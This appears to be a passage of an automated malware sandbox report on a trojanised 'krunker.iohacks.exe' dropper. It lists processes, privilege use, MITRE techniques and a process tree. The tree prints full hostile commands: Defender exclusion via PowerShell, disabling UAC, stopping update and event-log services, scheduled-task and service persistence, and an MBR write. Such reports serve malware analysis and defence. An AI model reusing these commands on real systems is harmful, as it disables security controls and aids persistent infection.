06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	wr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	propro.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

NOTEPAD.EXE

pid	Process
5808	NOTEPAD.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
6132	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

[email protected]msedge.exemsedge.exe8.exe6.exemsedge.exebot.exevbc.exe7.exepinguin.exeliveupdate.exepowershell.exemsedge.execmd.exepropro.exeTraffic.exe

pid	Process
1664	[email protected]
1664	[email protected]
1664	[email protected]
1664	[email protected]
3840	msedge.exe
3840	msedge.exe
4692	msedge.exe
4692	msedge.exe
4840	8.exe
4840	8.exe
1012	6.exe
1012	6.exe
5428	msedge.exe
5428	msedge.exe
2136	bot.exe
2136	bot.exe
5000	vbc.exe
5000	vbc.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
2136	bot.exe
5024	7.exe
5024	7.exe
5940	pinguin.exe
5940	pinguin.exe
5940	pinguin.exe
5340	liveupdate.exe
5340	liveupdate.exe
4204	powershell.exe
4204	powershell.exe
4204	powershell.exe
6172	msedge.exe
6172	msedge.exe
6172	msedge.exe
6172	msedge.exe
3400	cmd.exe
3400	cmd.exe
3400	cmd.exe
3400	cmd.exe
6992	propro.exe
6992	propro.exe
2108	Traffic.exe
2108	Traffic.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

VLTKNH~1.EXE

pid	Process
5508	VLTKNH~1.EXE
5508	VLTKNH~1.EXE

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid	Process
684
684

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

liveupdate.execmd.exe

pid	Process
5340	liveupdate.exe
3400	cmd.exe
5340	liveupdate.exe
3400	cmd.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

Processes:

msedge.exe

pid	Process
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

4363463463464363463463463.exe[email protected]6.exevssvc.exeAUDIODG.EXE7.exe6.exebot.exesystem.exeLJAUYP~1.EXETJEAJW~1.EXEpowershell.exeVLTKNH~1.EXEtaskkill.exewmic.exe

description	pid	Process
Token: SeDebugPrivilege	104	4363463463464363463463463.exe
Token: SeShutdownPrivilege	1960	[email protected]
Token: SeCreatePagefilePrivilege	1960	[email protected]
Token: SeDebugPrivilege	1012	6.exe
Token: SeBackupPrivilege	5344	vssvc.exe
Token: SeRestorePrivilege	5344	vssvc.exe
Token: SeAuditPrivilege	5344	vssvc.exe
Token: 33	5308	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5308	AUDIODG.EXE
Token: SeDebugPrivilege	5024	7.exe
Token: SeDebugPrivilege	320	6.exe
Token: SeDebugPrivilege	2136	bot.exe
Token: SeDebugPrivilege	6000	system.exe
Token: 33	6000	system.exe
Token: SeIncBasePriorityPrivilege	6000	system.exe
Token: SeDebugPrivilege	5904	LJAUYP~1.EXE
Token: 33	6000	system.exe
Token: SeIncBasePriorityPrivilege	6000	system.exe
Token: 33	6000	system.exe
Token: SeIncBasePriorityPrivilege	6000	system.exe
Token: SeDebugPrivilege	5256	TJEAJW~1.EXE
Token: SeDebugPrivilege	4204	powershell.exe
Token: 33	6000	system.exe
Token: SeIncBasePriorityPrivilege	6000	system.exe
Token: SeDebugPrivilege	5508	VLTKNH~1.EXE
Token: 33	6000	system.exe
Token: SeIncBasePriorityPrivilege	6000	system.exe
Token: 33	6000	system.exe
Token: SeIncBasePriorityPrivilege	6000	system.exe
Token: 33	6000	system.exe
Token: SeIncBasePriorityPrivilege	6000	system.exe
Token: 33	6000	system.exe
Token: SeIncBasePriorityPrivilege	6000	system.exe
Token: 33	6000	system.exe
Token: SeIncBasePriorityPrivilege	6000	system.exe
Token: 33	6000	system.exe
Token: SeIncBasePriorityPrivilege	6000	system.exe
Token: SeDebugPrivilege	2232	taskkill.exe
Token: SeIncreaseQuotaPrivilege	6868	wmic.exe
Token: SeSecurityPrivilege	6868	wmic.exe
Token: SeTakeOwnershipPrivilege	6868	wmic.exe
Token: SeLoadDriverPrivilege	6868	wmic.exe
Token: SeSystemProfilePrivilege	6868	wmic.exe
Token: SeSystemtimePrivilege	6868	wmic.exe
Token: SeProfSingleProcessPrivilege	6868	wmic.exe
Token: SeIncBasePriorityPrivilege	6868	wmic.exe
Token: SeCreatePagefilePrivilege	6868	wmic.exe
Token: SeBackupPrivilege	6868	wmic.exe
Token: SeRestorePrivilege	6868	wmic.exe
Token: SeShutdownPrivilege	6868	wmic.exe
Token: SeDebugPrivilege	6868	wmic.exe
Token: SeSystemEnvironmentPrivilege	6868	wmic.exe
Token: SeRemoteShutdownPrivilege	6868	wmic.exe
Token: SeUndockPrivilege	6868	wmic.exe
Token: SeManageVolumePrivilege	6868	wmic.exe
Token: 33	6868	wmic.exe
Token: 34	6868	wmic.exe
Token: 35	6868	wmic.exe
Token: 36	6868	wmic.exe
Token: 33	6000	system.exe
Token: SeIncBasePriorityPrivilege	6000	system.exe
Token: 33	6000	system.exe
Token: SeIncBasePriorityPrivilege	6000	system.exe
Token: SeIncreaseQuotaPrivilege	6868	wmic.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	Process
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

Processes:

msedge.exe

pid	Process
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe
3840	msedge.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

EXCEL.EXEstub.exe@[email protected]

pid	Process
2804	EXCEL.EXE
3876	stub.exe
3876	stub.exe
6540	@[email protected]
2804	EXCEL.EXE
3876	stub.exe
3876	stub.exe
6540	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

krunker.iohacks.execmd.exe[email protected]RIP_YOUR_PC_LOL.exebot.exeska2pwej.aeh.exe[email protected]1.execmd.exex2s443bc.cs1.execmd.exemsedge.exe

description	pid	Process	procid_target
PID 3788 wrote to memory of 2888	3788	krunker.iohacks.exe	79
PID 3788 wrote to memory of 2888	3788	krunker.iohacks.exe	79
PID 3788 wrote to memory of 2888	3788	krunker.iohacks.exe	79
PID 2888 wrote to memory of 104	2888	cmd.exe	83
PID 2888 wrote to memory of 104	2888	cmd.exe	83
PID 2888 wrote to memory of 104	2888	cmd.exe	83
PID 2888 wrote to memory of 1508	2888	cmd.exe	84
PID 2888 wrote to memory of 1508	2888	cmd.exe	84
PID 2888 wrote to memory of 1508	2888	cmd.exe	84
PID 2888 wrote to memory of 1960	2888	cmd.exe	86
PID 2888 wrote to memory of 1960	2888	cmd.exe	86
PID 2888 wrote to memory of 1960	2888	cmd.exe	86
PID 2888 wrote to memory of 1664	2888	cmd.exe	87
PID 2888 wrote to memory of 1664	2888	cmd.exe	87
PID 2888 wrote to memory of 1664	2888	cmd.exe	87
PID 2888 wrote to memory of 780	2888	cmd.exe	88
PID 2888 wrote to memory of 780	2888	cmd.exe	88
PID 2888 wrote to memory of 780	2888	cmd.exe	88
PID 2888 wrote to memory of 2324	2888	cmd.exe	89
PID 2888 wrote to memory of 2324	2888	cmd.exe	89
PID 2888 wrote to memory of 2324	2888	cmd.exe	89
PID 780 wrote to memory of 1048	780	[email protected]	90
PID 780 wrote to memory of 1048	780	[email protected]	90
PID 780 wrote to memory of 1048	780	[email protected]	90
PID 780 wrote to memory of 2532	780	[email protected]	91
PID 780 wrote to memory of 2532	780	[email protected]	91
PID 780 wrote to memory of 2532	780	[email protected]	91
PID 2324 wrote to memory of 3220	2324	RIP_YOUR_PC_LOL.exe	92
PID 2324 wrote to memory of 3220	2324	RIP_YOUR_PC_LOL.exe	92
PID 2324 wrote to memory of 3220	2324	RIP_YOUR_PC_LOL.exe	92
PID 2888 wrote to memory of 2740	2888	cmd.exe	94
PID 2888 wrote to memory of 2740	2888	cmd.exe	94
PID 2888 wrote to memory of 2740	2888	cmd.exe	94
PID 1508 wrote to memory of 2136	1508	bot.exe	98
PID 1508 wrote to memory of 2136	1508	bot.exe	98
PID 1508 wrote to memory of 2136	1508	bot.exe	98
PID 780 wrote to memory of 2376	780	[email protected]	99
PID 780 wrote to memory of 2376	780	[email protected]	99
PID 780 wrote to memory of 2376	780	[email protected]	99
PID 780 wrote to memory of 4696	780	[email protected]	102
PID 780 wrote to memory of 4696	780	[email protected]	102
PID 780 wrote to memory of 4696	780	[email protected]	102
PID 2740 wrote to memory of 2976	2740	ska2pwej.aeh.exe	100
PID 2740 wrote to memory of 2976	2740	ska2pwej.aeh.exe	100
PID 2740 wrote to memory of 2976	2740	ska2pwej.aeh.exe	100
PID 2888 wrote to memory of 5064	2888	cmd.exe	103
PID 2888 wrote to memory of 5064	2888	cmd.exe	103
PID 2888 wrote to memory of 5064	2888	cmd.exe	103
PID 1960 wrote to memory of 900	1960	[email protected]	101
PID 1960 wrote to memory of 900	1960	[email protected]	101
PID 1960 wrote to memory of 900	1960	[email protected]	101
PID 3220 wrote to memory of 2844	3220	1.exe	108
PID 3220 wrote to memory of 2844	3220	1.exe	108
PID 4696 wrote to memory of 2444	4696	cmd.exe	107
PID 4696 wrote to memory of 2444	4696	cmd.exe	107
PID 4696 wrote to memory of 2444	4696	cmd.exe	107
PID 5064 wrote to memory of 4208	5064	x2s443bc.cs1.exe	109
PID 5064 wrote to memory of 4208	5064	x2s443bc.cs1.exe	109
PID 5064 wrote to memory of 4208	5064	x2s443bc.cs1.exe	109
PID 2844 wrote to memory of 3840	2844	cmd.exe	111
PID 2844 wrote to memory of 3840	2844	cmd.exe	111
PID 3840 wrote to memory of 4668	3840	msedge.exe	112
PID 3840 wrote to memory of 4668	3840	msedge.exe	112
PID 1960 wrote to memory of 1604	1960	[email protected]	113

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

Processes:

6.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	6.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid	Process
1048	attrib.exe
2416	attrib.exe
5272	attrib.exe

C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe
"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3788
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2888
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
    "4363463463464363463463463.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    PID:104
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\VLTKNH~1.EXE"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:5404
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\VLTKNH~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\VLTKNH~1.EXE
        5⤵
        Executes dropped EXE
        Writes to the Master Boot Record (MBR)
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:5508
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TIDEX_~1.EXE"
      4⤵
      Executes dropped EXE
      PID:5720
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TIDEX_~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TIDEX_~1.EXE
        5⤵
        Executes dropped EXE
        
        PID:5832
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5832 -s 716
        6⤵
        Program crash
        
        PID:4712
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5832 -s 716
        6⤵
        Program crash
        
        PID:5668
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pinguin.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:2124
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pinguin.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\pinguin.exe
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:5940
    - - C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
        
        C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:5340
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:3400
        
        C:\Windows\System32\certutil.exe
        
        C:\Windows\System32\certutil.exe
        7⤵
        Suspicious use of SetThreadContext
        
        PID:2620
        
        C:\Windows\explorer.exe
        
        explorer.exe
        8⤵
        
        PID:1976
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\LJAUYP~1.EXE"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:1268
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\LJAUYP~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\LJAUYP~1.EXE
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5904
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TJEAJW~1.EXE"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:3480
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TJEAJW~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TJEAJW~1.EXE
        5⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:5256
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4204
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CNSWA" /tr "C:\ProgramData\Chrome\CNSWA.exe"
        6⤵
        Executes dropped EXE
        
        PID:1460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn CNSWA /tr C:\ProgramData\Chrome\CNSWA.exe
        7⤵
        
        PID:7072
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn CNSWA /tr C:\ProgramData\Chrome\CNSWA.exe
        8⤵
        DcRat
        Creates scheduled task(s)
        
        PID:1628
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ALEXXX~1.EXE"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:2904
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ALEXXX~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ALEXXX~1.EXE
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2820
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Modifies registry class
        
        PID:4044
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\propro.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:6028
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\propro.exe
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\propro.exe
        8⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        
        PID:6992
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\Traffic.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:6164
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\Traffic.exe
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\Traffic.exe
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2108
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TOOLSP~1.EXE"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:3724
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TOOLSP~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TOOLSP~1.EXE
        5⤵
        Executes dropped EXE
        
        PID:6596
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6596 -s 372
        6⤵
        Program crash
        
        PID:2636
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Wattyl.exe"
      4⤵
      Executes dropped EXE
      PID:5768
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Wattyl.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Wattyl.exe
        5⤵
        Modifies WinLogon for persistence
        Disables RegEdit via registry modification
        Executes dropped EXE
        Adds Run key to start application
        Enumerates connected drives
        Drops file in System32 directory
        Drops file in Windows directory
        
        PID:4784
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C AT /delete /yes
        6⤵
        
        PID:5604
        
        C:\Windows\SysWOW64\at.exe
        
        AT /delete /yes
        7⤵
        
        PID:5052
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
        6⤵
        
        PID:5452
        
        C:\Windows\SysWOW64\at.exe
        
        AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
        7⤵
        
        PID:1028
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SWIZZY~1.EXE"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:2328
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SWIZZY~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SWIZZY~1.EXE
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6916
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:3584
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:6612
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5920
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\TRUECR~1.EXE"
      4⤵
      Drops file in Windows directory
      PID:1572
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\stub.exe"
      4⤵
      Drops file in Windows directory
      PID:7136
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\stub.exe
        5⤵
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:3876
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DOUBLE~1.EXE"
      4⤵
      Drops file in Windows directory
      PID:6728
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DOUBLE~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DOUBLE~1.EXE
        5⤵
        
        PID:5488
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\html.exe"
      4⤵
      PID:5272
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\html.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\html.exe
        5⤵
        
        PID:5080
      - C:\Program Files (x86)\Common Files\microsoft shared\ink\pipanel.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\html.exe
        6⤵
        
        PID:1980
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FirstZ.exe"
      4⤵
      Drops file in Windows directory
      PID:5992
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FirstZ.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\FirstZ.exe
        5⤵
        
        PID:3812
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        
        PID:5248
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:6908
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:4644
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:5804
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:4768
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:4928
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:6436
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:1532
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        
        PID:6380
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        
        PID:6472
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        
        PID:6644
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        
        PID:6960
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "WSNKISKT"
        6⤵
        Launches sc.exe
        
        PID:4956
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:5280
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:7104
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WSNKISKT"
        6⤵
        Launches sc.exe
        
        PID:6360
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\1111.exe"
      4⤵
      PID:5504
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\1111.exe
        
